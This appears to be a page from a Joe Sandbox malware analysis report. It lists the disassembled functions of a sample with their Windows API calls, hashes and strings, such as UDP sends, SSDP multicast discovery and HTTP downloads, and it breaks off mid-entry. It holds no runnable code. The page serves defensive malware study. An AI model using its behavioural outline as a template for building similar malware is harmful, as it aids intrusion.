Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94

Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00407726
srand.MSVCRT ref: 0040772D
rand.MSVCRT ref: 00407735
Sleep.KERNEL32 ref: 00407746
StrChrA.SHLWAPI(00000000,0000007C), ref: 0040776C
Sleep.KERNEL32(000003E8), ref: 0040779D

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Sleep$CountTickrandsrand
String ID:
API String ID: 3488799664-0
Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56

Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 0040986D
_aullshr.NTDLL ref: 0040987E
_allshl.NTDLL ref: 004098A0
_aullshr.NTDLL ref: 004098BC
_allshl.NTDLL ref: 004098DE
_aullshr.NTDLL ref: 004098FA

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB

Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4

Strings

?c@, xrefs: 00406369, 004063A8, 0040636C, 004063AB
\??\, xrefs: 004063B8

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryType
String ID: ?c@$\??\
API String ID: 1681518211-744975932
Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99

Function 0040B530 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(004163E0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID:
API String ID: 442028454-0
Opcode ID: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
Opcode Fuzzy Hash: f5b45801421cf4693db4a952f6c7f3d93a7964b949aee7b1e37d5bd3e27ea16a
Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99

Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 0040944E
_allshl.NTDLL ref: 0040945D
_allshl.NTDLL ref: 0040946C
_allshl.NTDLL ref: 0040947B
_allshl.NTDLL ref: 0040948A

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1

Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB

Strings

pdu, xrefs: 00401339

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu
API String ID: 309973729-2320407122
Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A

Function 0040DE90 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
CloseHandle.KERNEL32(?), ref: 0040DED8
LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID:
API String ID: 3102160386-0
Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28

Function 00407390 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
SysAllocString.OLEAUT32(004161D0), ref: 004073A3
CoUninitialize.OLE32 ref: 004073C8

Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8

SysFreeString.OLEAUT32(00000000), ref: 004073C2

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID:
API String ID: 459949847-0
Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755

Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690

SysFreeString.OLEAUT32(00000000), ref: 004075F8

Strings

Microsoft Corporation, xrefs: 00407566

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66

Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837

Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621

SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
SysFreeString.OLEAUT32(00000000), ref: 0040E4E5

Strings

%S%S, xrefs: 0040E4C6

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1

Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA

Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285

Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5

Strings

TCP, xrefs: 0040E13B
UDP, xrefs: 0040E158

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89

Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

